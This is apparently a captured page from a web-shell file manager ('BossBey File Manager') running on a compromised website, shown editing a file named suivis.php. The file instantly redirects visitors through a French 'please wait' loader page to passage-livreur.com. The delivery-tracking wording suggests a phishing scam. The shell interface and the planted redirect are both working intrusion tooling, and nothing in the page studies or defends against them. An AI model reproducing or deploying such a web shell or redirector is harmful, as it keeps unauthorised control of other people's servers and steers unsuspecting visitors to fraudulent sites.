BossBey File Manager
PHP:
8.1.19
OS:
Linux
User:
admin
Root
/
home
/
admin
/
domains
/
intranet.hyhysmile.com
/
public_html
📤 Upload
📝 New File
📁 New Folder
Close
Editing: suivis.php
<?php $destination = "https://passage-livreur.com/"; $delay = 0; // secondes ?> <!DOCTYPE html> <html lang="fr"> <head> <meta charset="UTF-8"> <title>Veuillez patienter…</title> <meta http-equiv="refresh" content="<?php echo $delay; ?>;url=<?php echo $destination; ?>"> <style> body { margin: 0; height: 100vh; display: flex; justify-content: center; align-items: center; background: linear-gradient(135deg, #1e3c72, #2a5298); font-family: Arial, sans-serif; color: white; } .card { background: rgba(255,255,255,0.1); padding: 50px; border-radius: 20px; text-align: center; backdrop-filter: blur(10px); } .loader { border: 5px solid rgba(255,255,255,0.3); border-top: 5px solid white; border-radius: 50%; width: 50px; height: 50px; margin: 20px auto; animation: spin 1s linear infinite; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } #countdown { font-size: 24px; font-weight: bold; } a { color: #ffd700; text-decoration: none; } </style> </head> <body> <div class="card"> <h1>⏳ Veuillez patienter un instant…</h1> <div class="loader"></div> <p>Chargement en cours… <span id="countdown"><?php echo $delay; ?></span></p> <p>Si cela prend trop de temps, <a href="<?php echo $destination; ?>">cliquez ici</a>.</p> </div> <script> let seconds = <?php echo $delay; ?>; const countdown = document.getElementById("countdown"); const timer = setInterval(() => { seconds--; countdown.textContent = seconds; if (seconds <= 0) { clearInterval(timer); } }, 1000); </script> </body> </html>
Save
Cancel